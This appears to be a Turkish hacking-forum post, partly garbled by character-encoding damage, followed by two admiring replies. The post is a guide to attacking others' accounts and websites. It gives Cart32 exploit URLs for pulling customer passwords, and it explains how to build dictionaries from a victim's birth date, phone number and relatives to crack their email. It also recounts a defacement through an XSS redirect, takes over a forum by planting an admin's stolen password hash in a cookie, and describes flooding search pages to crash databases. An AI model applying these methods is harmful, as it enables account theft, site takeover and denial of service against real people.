Mü?teri ?ifreleri için-> [URL="https://tik.lat/KHW8N"] http://www.michaeljackson.com/cgi-b...cart32clientlis[/URL] t

Bilgisyar Klasörünü görüntülemek için->
[URL="https://tik.lat/jbo3Z"] http://www.michaeljackson.com/cgi-bin/cart32/error[/URL]

Unutmayyn* michaeljackson.com yerine Vulnerable olan scriptin bulundu?u site adresi yazylacaktyr. Pathler de?i?ebilir ama v4.00 a kadar olan tüm scriptlerdeki açyk ayny yöntem ve komutlarla sabit kalyr.”

------------------------------------------------------------ ------------------


Ki?iyi Kandyrma: Yöntemlerin en ilginci budur J Kar?ynyzdaki ki?iyi* bir ?ekilde kandyryp* ondan bir mail ?ifresi yada buna benzer bir ?ey (gizli soru cevaby) alynarak ?ifreye ula?ma yoludur. Tavsiye edilmez....

Brute Ve Dict. Force: Bir dosya içine yazylmy? ?ifrelerin bir programla denenmesi i?lemine Dictionary Attack* var olabilecek tüm ?ifre kombinasyonlarynyn denenmesi olayyna Brute Force Attack denir. Bu iki yöntem çok uzun sürecek yöntemlerdir. E?er ki bekleyecek bir kaç yüz yylynyz varsa sonuç alabilirsiniz J Ama hiç belli olmaz* kysa zamanda da sonuç alynabilir* hiç sonuçta alynmayabilir.

?imdi bir Dictionary Attack için ?ifre hazyrlamak isteyenlere 2001 yylynda yazmy? oldu?um ?ifre kyrma manty?y ile ilgili yazymdan bir alyntyyy koymak istiyorum.



------------------------------------------------------------ ----------------------------------


“... Y?te bu deneyece?iniz ?ifreleri hazyrlamada yardym edecek bir kaç ?ey anlatmak istiyorum. Bunlary ?u güne kadar ya?ady?ym olaylardan esinlenerek yazyyorum.


?imdi diyelim ki X (12-03-1984) ya?ynda olan Ali adynda birinin Hotmailini kyraca?yz. Bu adamy az buçuk tanyyoruz. Mesela ayny okulda ayny synyftasynyz* ne kadar bu i?lerden çakty?ynyda biliyorsunuz. O zaman ba?alyalym. Bu adamynda soyady Veli olsun yani Ali Veli. Cep telefonuda 0 535 543 21 09 olsun.

Bu adam en basitinden ?ifresini bir 1984 koymak ister sonra olamdy der 19841984 koymak ister o da olmady 12031984 koymak ister. Bunlarla do?um tarihine göre kombinasyonlar yapabiliriz. Daha çok seçenek var. En çok 19841984 tutar. Bu adamyn ?ifresi 05355432109 olabilir. Yada 5432109 olabilir.

?ifre VeliAli olabilir AliVeli olabilir* babasynyn ady Ahmet olsun* AhmetVeli olabilir. VeliAhmet olabilir. AlVel olabilir.Aliv84 olabilir. yada Galatasarayly olsun benim gibi* o zaman GS84 olabilir. aliGS84 olabilir. AGS84 olabilir. Yada ev telefonuda olabilir.

Diyelim ki gizli sorusunu bulucaz. Soru yanlyzca "ALIM" diye bir kelime. O zaman onun cevaby yukardakinin aynysy yani "ALIM" olabilir.

Yada ?ifre yedi tane 7 * üç tane 3 de olabilir. 54321 olabilece?i gibi 123456789 da olabilir. 0000 da olabilir 9876543210 da olabilir.

Oturdu?u apartman* ?ehir* sokak isimleride kullanylyr. Annesinin kyzlyk soyady. Yada okul numarasy. Sonuçta ki?i unutmamak için herkesin bildi?i ve kullany.. bazy numaralardan ve isimlerden bir kombinasyon yapmak isteycektir. Bizim burda yapmamayz gereken burda bu ki?iye göre yapylabilecek kombinasyonlary tahmin edip bir sözlük hazyrlayarak. Dict. attack yapmak olacaktyr. Baya uzun süren bir i? olabilir ama bu tarz ?ifreler kullanan biriyse kesin dü?er zokaya.

Mesela bazy klavye oyunlary vardyr. Q klavyeler QWERTY harfleriyle ba?lar* bunlar rahatlykla ?ifre olabilir. Yada QAZWSXEDC harfleride olabilir. Bakyn bakalym bu harfler klavyede nasyl dizilmi??

Yada rakamlardan 98745632210 olabilir. Bu sizin dü?ünce kabiliyetinize ba?ly daha çok üretebilirsiniz.


Bu tarz klavye oyunlaryyla hazyrlanmy?* ayryca ki?iye özel olarakta hazyrlanmy? bir sözlü?ün; sanyyorum ki ba?akalarynyn ?ifrelerini bulmakta büyük yarary olur* ki oluyor zaten.
Bazen ?ahyslar en sevdikleri hayvany* e?yayy* ?arkycyyy* futbolcuyu falanda yazarlar.
Demek ki ?ahsi olan biligilere ve klavye oyunlaryna dikkat etmemiz gerekiyormu?. Önemli olan ki?i için kolay hatyrlanabilecek bir ?ey yazmak. Herkes ?ifrelerini bu mantykla bulur. Eminimki bu yazyyy okuyanlardan* yani sizlerden birileri de burda kendi ?ifresinin formülünüde görmü?tür. Dedim ya herkes bu tarz ?eyler kullanyyor. Ama bilmiyor ki bu yöntemleri bazylary zaten biliyor. Ynsan manty?y i?te* her yerde ayny...”



------------------------------------------------------------ ----------------------------------

Bilgisayar Bilimiyle u?ra?an yada bu i?lerden daha çok anlayanlaryn kullandylklary yöntemler:

Bu ki?iler yukardaki yöntemleri kullanabilir ama yukardaki bilgileri kullanabilen ki?iler bu yöntemleri kullanamaz...

Enjeksiyon Yöntemleri: Bilinen scriptler veya bilinmeyen scriptler içindeki açyk ve hatalary kullanarak* bir database’e kod girme yada benzeri bir kodun çaly?masyny sa?lamaktyr. Örnek vermem gerekirse* 2003 mayys ayynda* bir siteyi bu yöntemle hack etmi?tim. Site bir arama motoru koymu?tu. Arama motorunda yazdy?ynyz kelime en son arananlar diye bir liste çykyyordu ve orda da ana sayfada gözüküyordu. Ancak aramaya girilen kelime “* \* /* <* > içerse bile bu içerilen HTML koduna aynen yazylyyordu. Yani Special Chars dedi?imiz bu karakterler do?al halleriye yazylyyor &NbSp; gibi özel HTML dili ile yazylmyyordu. Bende arama kysmyna ufak bir Java Script yönlendirme kodu girdim ve anasayfayy spymastersnake.org’a yönlendirdim. Böylece o siteye giren ki?i 1 saniye sonra direkt bizim siteye yönlenmi? oluyordu.
Bu örnekte oldu?u gibi* bazy forum scriptlerinin kullandy?y DataBase’lere bazy kodlama hatalaryndan yararlanarak* de?erler girilebiliyor. Bunlaryn en ünlülerinden birisi* 2002 yylynda bulunan Snitz forumlary açy?ydyr.



Permission Açyklary: Gerek HTTP gerek FTP üzerinden olsun* bu açyklar her ?ekilde risk olu?turur. En güvenli sistem* Unix/Linux sistemidir. Bildi?iniz üzere Multi-User i?letim sistemlerinde* bir dosyaya sizden ba?ka kimin ula?yp* ula?amayaca?yny ayarlayabilece?iniz* Kernel tarafyndan yönetilen bir Permission Tablosu vardyr. Linux ile bir örnekle açyklayayym:
Bir Linux makinada benim Home klasörüm “gokhan” olsun ve yolum a?a?ydaki gibi olsun:

Yçinde de MichaelJackson.mp3 diye bir dosya olsun.

“ /etc/home/gokhan/spymastersnake/MichaelJackson.mp3”

Burdaki “etc” klasörü herkesin okumasyna açyk* ancak yazma i?lemlerine kapaly bir klasördür. Ben klasörün içeri?ini görebilirim ama içine dosya koyamam. Diyelimki “etc” altynda BeatIt.mp3 isimli bir dosya olsun. Klasörün herkese açyk okunabilir READ ayary açyk oldukça bu dosyayy alabilirim. E?erki Herkese açyk EXECUTE ayary açyksa ben bu dosyayy Shell den komut girerek bir mp3 playerla açabilirim. E?erki Dosyanyn READ ayary herkese kapaly ise ben sadece bu dosyayy okuyamam. Ayny ?ekilde dosyanyn READ ayary açyk olursa fakat klasörün READ ayary kapaly olursa “etc” klasörünün içi bo? görünsede dosyanyn direk yolu yani “/etc/BeatIt.mp3” girilirse ben bu dosyayy okuyabilirim. Y?te burda anlatty?ym klasör ve dosya Permission ayarlarynda bir kullanycy bir klaörün READ ayaryny kaldyrarak o klasörün içindeki bir dosyanyn eri?ime kapaly oldu?u sanmaktadyr. Halbuki burda eri?ime kapaly olan klasörün içeri?idir. Yani TOC dedi?imiz Table Of Contets ö?esidir. Ki bu ö?e yine KERNEL tarafyndan düzenlenir. Elbette bu anlattyklarym Web serverlary üzerinden yapty?ynyz istemler için de?il* makinada sahip oldu?unuz shell ile yada FTP ile yapabilece?iniz ?eyler.

“gokhan” klasörü burda sadece benim grubuma yada bir de?i?le sadece bana açyk olan kysymdyr. Öyleki sadece yazma yetkisi Group ve Admin elindedir. E?erki biri bu ayary herkesin yazyp okuabilece?i moda getirirse* bu “gokhan” klasörü halka mal olmu? umumi bir klasör olur J Ve sonuçta altynda bulunan tüm dizinler riske girer. Bu tarz Permission hatalary ile hacklenen yada veri kaçyry.. sitelerin sayysy saymakla bitmez. ?u an hala Kredi Kartlary çalynabiliyorsa bunun nedeni bu ayarlaryn yapylamamasydyr.

Bir klasöre uygulady?ynyz izin ayary* sadece o klasör’ün TOC’i içindir. Yçindeki bir dosya bundan etkilenmez. Fakat dosyanyn EXECUTE edilebilmesi gibi klasörün durumununda soruldu?u zamanlarda bu önem ta?yr. Bir dosyanyn edit edilmesi demek* o dosyanyn silinip yerine bir yenisini yazmaktan farksyzdyr* bu yüzden Write izni açyk olmayan bir klasördeki dosyayy editleyemezsiniz yada klasöre yeni dosya koyamazsynyz. Permission ayarlaryny bilmeyen yada detayly bir webmaster için son her zaman 1 adym yakyndadyr. Nitekim bu ayarlary bilmeden “Forum Kuracam” diye ortaly?a çykan ve her ne hikmetse her önüne gelenin forum kurdu?u bir ülkede* bu ayarlardan çykan açyklar önem ta?ymaktadyr.

E?er bir yerden host almy?sanyz* o makinada bir hesabynyz var demektir ve komut çaly?tyrabilirsiniz demektir. Bunu yapmak için scriptler birebirdir. E?er ki SSH yetkiniz varsa bunu SSH Shelli üzerinden yada Telnet varsa onun üzerinden de yapabilirsiniz. Bunu en güzel örne?i bir scriptle komut çaly?tyrmak için PHPde ?udur..

PHP
--------------------

<?

system(komut);

?>

--------------------

Bir çok bilimsel bilgisi eksik ki?i* bu olayy ASP için dü?ünerek* bunun bir açyk oldu?unu sanmaktadyr. Ve adyna FSO açy?y demektedir. Halbuki bu bir açyk de?ildir. Size verilen bir haktyr.

?imdi size 2001 yylynda yazmy? oldu?um* Web Hack dökümanyndan bir alynty ile konuyu açaca?ym.

------------------------------------------------------------ ---------------------------------

“......... Bir baktym ki onlarda bizim formumumuz olan IKONBOARD un aynysyny kullanyyor. Neyse baktym xxxxx benim türkçele?tirmedi?i yerleri de türkçele?tirmi? forumun. Bende benim forumdan ve onun forumdan ona PM attym ve bu dosyalary istedim. Bana verece?ini söyledi* aradan vakit geçti dosyalary alamadym çünkü xxxxx sanyyorum ki evinde de?ilmi? ?ehir dy?yndaymy?.

Bende baktym olmuyor bekle bekle* Allah'a ?ükür bu i?lerden anlady?ym için hemen yapmam gerekeni yaptym ve onun bana yollayaca?y dosyalary kendim aldym... nasyl my?

Ben ikonboard'un dil dosyalaryny falan nereye kurdu?unu biliyorum. Yani tüm klasörlerin nerede ve hangi isimle oldu?unu biliyorum. Çünkü bende ikonboard kullanyyorum. Bende madem öyle dedim* ve forumun dil dosyalaryny indirmeye ba?ladym yapty?ym ?u idi. Mesela hata mesajlaryny bulunduran dil dosyasyny istiyorsam [URL="https://tik.lat/0Wd8A"] http://www.xxxxx.com/cgi-bin/ikon3/...en/ErrorWords.p[/URL] m yazmam yeterli. Dan diye ben bu dosyayy download edebiliyorum.

Y?te ben böylece tüm dosyalary download ettim ve gördüm ki onun forum ile benim forum farkly versiyonmu? dosyalar uyu?mady.

Herneyse ben istedi?imi aldym ama iyi bir insan olarak. Peki diyelim ki ben kötü biriyim ve neler yaparym. Ylk yapyca?ym i? forumun DATABASE dosyasyny ele geçirmek olacaktyr. Bu sayede ben tüm forumdaki kullanycylara ?ifrelere ve maillere ula?abilirim. Bu kadar basit! Ha bu ?ifereler HASH edilmi? olaca?yndan siz okuyamazsynyz bunlary. Bunu CRACK etmeniz gerekir. Tabii ben okurum bunlary. Olay basit aklyny kullanacaksyn.

Kendi bilgisayarymdaki COOKYE dosyasyny açarym(programla)* Forum adminin ID sini ve HASH edilmi? ?ifresini o databaseden alyrym ve kendi COOKYE dosyama koyarym. Forumun sayfasyna girince bir bakarym ki ADMYN olarak forumdayym. Daha sonra admin ?ifresini de?i?tiririm. Sonrada sitenin tamamyny hack ederim. Bu da basit en önce aldy?ym ?ifre ile FTP de bir deneme yaparym. Baktym olmuyor* bu forumlaryn File Managerlary var* isteyin dosyayy Admin odasyndan siliyorsun de?i?itriyosun falan. Ona girerim ve gerisini siz dü?ünün artyk. Bu i? bu kadar kolay! Bütün bir site bir anda ufak bir hata ile elinizin içine dü?ebilir....”

------------------------------------------------------------ ---------------------------------

Gördü?ünüz gibi en ufak hata yada unutkanlyk dedi?iniz ?ey bile* bu i?i bilen ki?ilerin eline geçti?i andan bir ?eylerin sonu olabilir. Yukarda bahsedilen örnek büyütülerek* ayny host altynda bulunan ba?ka sitelerinde zarar görebilece?i bir hale sokulabilir! Elbette bu ?ans gerektiren bir durum olur ama bu tarz olaylaryn ya?anabilece?i bir gerçektir.

Host Deface: Bir host gözde abartylacak bir sistem de?ildir. Hatta ço?u dedicated bir FireWall ile korunmaz bile. Ço?u 3-4 bilgisayardan olu?an amatör düzeyde hostlardyr. Sadece bir kaç büyük firma* odalar dolusu büyüklükte Dedicated host makinlaryna sahiptir. Ama bu onlaryn açy?y olmayacak anlamyna gelmez. Açy?y buluncak kadar büyük olmasa bile mutlaka saldyrylara dayanma synyrlary vardyr. D.o.S dedi?imiz saldyrylara kar?y bir ço?u kendini bazen yenik halde bulabilir. Hemde var olan FireWalllaryyla beraber. Peki nedir D.o.S?


D.O.S (Denial of Service) dedi?imiz ataklar* T1 T3 dedi?imiz yüksek ba?lantyly makinalar yada basit Win tabanly ve Dial-up tabanly makinalar tarafyndan yapy.. ping gönderme a?yry paket yollama ve BandWitdh dedi?imiz synyrlamaly veri transferi dedi?imiz olayyn üstüne çykarak Rate Limit Exceded gibi server hatalary almamyzy ISPden kopmanyzy ve ba?lantymyzyn crash olmasyny sa?layan NUKE de dedi?imiz ataklardyr. Bu ataklary herkes programa ihtiyaç dumadanda yapabilir ama bu iyi bir ba?lanty ve Win ata?y de?ilse Unyx gibi sa?lam bir sistem gerektirir. WinXP ve 2000 bu ataklar için önlem almy? sistemlerdir ve internete hyzly ba?..yrlar. Daha çok bilgi için Buaraya Bakyn. Kysaca D.o.S bir server’a kar?ylayabilece?inden fazla istek ve paket yollama durumudur. Bu durumda sunucu programy kilitlenir ve iyi kodlanmamy? stabil olmayan bir server programy ise hata verip kapanabilir. Ve o site siz bunu yaparken devre dy?y kalyr. Dü?ük ba?lantyly bir bilgisayar ile yapy.. D.o.S her zaman yüksek ba?lantyly makinalary kullanarak olmak zorundadyr. Bunun içinde ba?ka bilgisayarlar kullanylyr.



D.o.S benzeri ba?ka ataklarda vardyr. Bunlarda paket yollama yerine bir URL yada POST metodu için yüzlerce istek üretir. Bunlarda Flood programlary denir. Bunlaryn bir link’e tyklanmasy için hazyrlanan versiyonlaryna Clicker denir. Bu üç program türünün ve saldyry türününde manty?y aynydyr.



Bir forumun Search bölümüne yapaca?ynyz binlerce istek o forum scriptinin ve hostun size ayry.. CPU bölümünün* istekleri artyk daha geç kar?ylamasyna ve bazende database’in bir hata ile çökmesine neden olabilir. Buda veri kayby demektir. Bir forum scriptini yava?latyp hata vermesini sa?lamak için* en güzel yöntem arama kysmynda ayny anda yüzlerce arama yaptyrmaktyr. Çünkü arama i?lemi database’i en çok yoran ve bol cpu harcayan i?lemdir.



Ayny ?ekilde ço?u kez bir çok Host makinasynda* farkynda olmadan açyk unutulan Control Panel arayüzleri ve benzeri Shell tarzy* Telnet tarzy sunucular olmaktadyr. Bu tarz kullanylmayan sunucularyn portlaryny bulmak ve portlaryndan bir mesaj alarak hangi programyn çaly?ty?yny bulup ?ifre denemek* açyk denemek en mantyklysydyr.



Bir FTP server’yna ba?landy?ynyzda bazen sizin home klasörünüz dy?yndaki bir klasöre çykmanyza izin verilir. Ama çykty?ynyz klasörlerin içini bo? görürsünüz. E?erki bazy Full Pathler bulursanyz* bu tarz serverlar içinde di?er kullanycylaryn home klasörlerine ula?abilirsiniz.



Ayryca bu kysymda incelenecek bir di?er kysym ise Vulnerabilites dedi?imiz* korumanyn zayyf noktalaryny bize veren programlama hatalarydyr. Örne?in* Apache serverlerinda* kodlamadan çykan bir hata size o server'a saldyrma* syzma gibi imkanlar sa?layabilir. Ayny ?ekilde sürekli yama çykarylmasy nedeniyle yamaly gömle?e dönen Windows 2000 de bulunan bir güvenlik açy?y* size bir çok kapyyy açacaktyr. Bu tarz açyklary* "securityfocus" gibi güvenlik haber sitelerinden takip edebilir* veya kendiniz sistemde denemeler yaparak yeni açyklar bulabilirsiniz.



Benim kendi kendime deneyerek buldu?um açyklar oldu* hiçbirini de program sahiplerine yada güvenlik haber sitelerine iletmedim. Ancak bu i?leri yapyp* bu haberleri veren bir çok ki?i bulunmakta. Ve ço?uda News yada Mail gruplaryna üyedir. E?er bir açy?y herkesten önce ö?renmek istiyorsanyz bu yerlere üye olunuz. Yanly? bilgilerle oldu?unuz yerde saymak istemiyorsanyz* Türkiye'de ki Hack ady altyndaki sitelerin Hiçbirini syky bir ?ekilde takip etmeyiniz.



Çünkü bu siteler yanly? bilgi yanynda* sürekli kavga* gürültü ve basit bilindik ?eyleri söyleyip* güncel güvenlik geli?melerini baryndyrmamaktadyr. 2004'ün Mart ayy itibariyle bakty?ym hiçbir Hack sitesi* kendi adyma söylemem gerekirse* onay verilecek düzeyde de?ildi.



Bu i?lerde ilerlemek isteyenlerin ilk i?i* o siteleri byrakmak olmalydyr. Haftada 1-2 kez hepsini kolaçan etmek* sizin açynyzdan faydaly olacaktyr. Geri kalan vakitte ise sürekli ingilizce kaynaklardan yazylar okuyarak ve dü?ünüp* uygulama yapmalysynyz.



Exploitler: Y?in hem bilgili hemde bilgisiz kysmyna hitap edebilen tek bölümdür. Exploit ingilizce bir kelime olup* anlamy “Sömürme” dir. Burda sömürülen ?ey* bir host’un size açmy? oldu?u yetenek ve olanaklardyr. Örne?in bir host size Shell uygulamalary çaly?tyrmanyza izin veriyorsa ve siz bu izinle bir D.O.S programyny saldyry yapmak için kullanyyorsanyz bu bir Exploittir. Ayny ?ekilde* o hostun hack edilmesini sa?layacak* Kernel’e zarar verecek bir program açyyorsanyz* yada bir MySQL serveryna buldu?unuz ?ifre ile bir bilgi girecek yada bir bilgi alacaksanyz ve o sistemi hack etmeye çaly?caksanyz buda bir Exploittir. Kysacasy* host’un yetenekleri ile* kendisi dahil olmak üzere* bir sistemde istenmeyen bir i? yapacaksanyz* bu Exploittir. Bir hosting firmasyndan host alyrken size bir sözle?me imzalatyrlar. Bu sözle?mede* bir program çaly?tyramyyaca?ynyz yada bir server daha kuramayaca?ynyz gibi ?eyler yazar. Yani tüm host sa?layanlar sizin yapabilecklerinizin farkyndadyr ama ço?unlukla bu sözle?meleri okumayan sizler onlaryn farkynda olmady?yny sanyrsynyz.
Explotiler internette özellikle *.pl uzantyly Perl scriptleri halinde dolanyrlar. Esas görevleri içinde kodlanmy? olan ?eyleri yapyp size bir kapy açmaktyr. Bu i?leri bilmeyenler bu hazyr scriptleri alyr ve kullanyrlar. Bilen ki?iler ise kendileri dü?ünüp* bu scriptleri yazarlar. Yukarlarda bir yerde verdi?im bir hosttan tüm userlaryn hack edilmesi örne?inde ki?inin yazaca?y script yada program bir Exploit niteli?i ta?yr. Çünkü tüm userlaryn home klasöründeki indexleri de?i?tirmektedir. Ancak bu exploitlerin en güzeli Kernel’in i?levini bozmak için yazylanlarydyr. Öyledir ki* bir dönem WinNT için her normal user’a Administrator yetkileri atayan bir exploit bulunmu?tu. Bu exploit açyldy?y anda sistemi Unstable yapyp makinanyn tekrar ba?lamasyny sa?lyyordu. Daha sonra ise kernel deki Permission sistemi bozuluyordu. Fakat burda unutulmamasy gereken kysym* exploiti harekete geçirecek olan *.exe dosyasyny açabilme yetkinizin olmasy. Ayryca o *.exe dosyasy da Token Proccess olan Privilige ayarlaryny yapabilmeli. Aksi halde bir exploiti çaly?tyryp Kernel’e zarar vermek kolay de?ildir.

Domain Hack: Hack etmeye çaly?ty?ynyz sitenin domanini elde etmek* bir ?ekilde onu devre dy?y byrakmak en zor olanydyr. Bunun için bir ?ekilde domainin ?ifresi* domainin Registrar’ynyn açy?ynyn yakalanmy? olmasy gerekir. E?erki böyle bir ?ey yapylabilirse* o site ömür boyu size ait olabilir. Bunun yöntemleri çok fazla de?ildir ancak sonuç alma ihtimali az oldu?u için fazla üzerinde durulmasy anlamzsyzdyr. Ancak böyle bir ihtimal ve yöntemin oldu?unu bilmeniz size avantaj sa?layacaktyr.
Yukaryda anlatylmy? olan 10 yöntem grubundan elbette daha çok yöntem var. Ve hepside yetenek-zeka ikilisine dayanmakta. Ancak benim yukarda yazdy?ym 10 yöntem bunlaryn en yaygynlary. Bazy bir kaç özel* yaygyn olmayan ama çok rahat kullanylabilen yöntemlerde var. Ancak onlaryn böyle halka açyk bir dökümanda yayynlamam imkansyz. Ancak SpyMasterSnake Yleri Düzey üyeleri arasynda payla?ylyp* geli?tirilebilecek yöntemler bunlar. Bu yöntemlerde geli?tikten sonra kullanylmasy ve anla?ylmasy kolay hale gelecektir.

Unutmayyn ki bu i?ler sihirle yada de?nek ile olmuyor. Her?ey bir ara?tyrma ve dü?ünme sonucunda olu?an ?eyler. Bir gün 50 bin yada 150 site hackledik gibi bir site ile kar?yla?yrsanyz ?a?yrmayyn* onlar bu i?lere yeni ba?lamy? ve insanlary çevrelerine toplamak isteyen ki?ilerdir. Bilgi almaya giderseniz* eliniz bo? dönersiniz* çünkü olmayan bir ?eyi almanyz zor olur* olsa bile alabilece?iniz meçhuldur J

Yngilizcesi iyi olmayan bir yada hiç olmayan birinin* bu i?leri yapmasy kysaca imkansyzdyr. Lütfen bol bol ingilizce çaly?yn ve dilinizi geli?tirin. Hiçbir yöntem veya programy (trojan) a?a?ylamayyn* çok ufakta görünse bir açyk* sonuçta açyktyr ve gün gelip ba?ynyza bela olabilir.
 

GLOBAL34

Katılımcı Üye
29 Eyl 2006
327
0
dünyadan
BABA SEN NE YAPTIN BEN BUNU OKUSAN GEBERIRIM:d:d:d: ZATEN MANYAK OLMUŞUM :d TAM MANYAK OLRUUM
NEYSE ELLERINE SAĞLIK GUZLE PAYLAŞIM EMEĞE SAYGILIYIM:d
 

sLayEr

Özel Üye
2 Ara 2006
781
5
İstanbul
bu ne hacı Yha..ben okULda 2 satırLık seyi okUmaya üŞhenirdim..sen ne yaPmıssın böLe makaLe yazMıshsın hacı..:)..neyse emege sAygı pAyLa$hıMın için saol..
 
Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.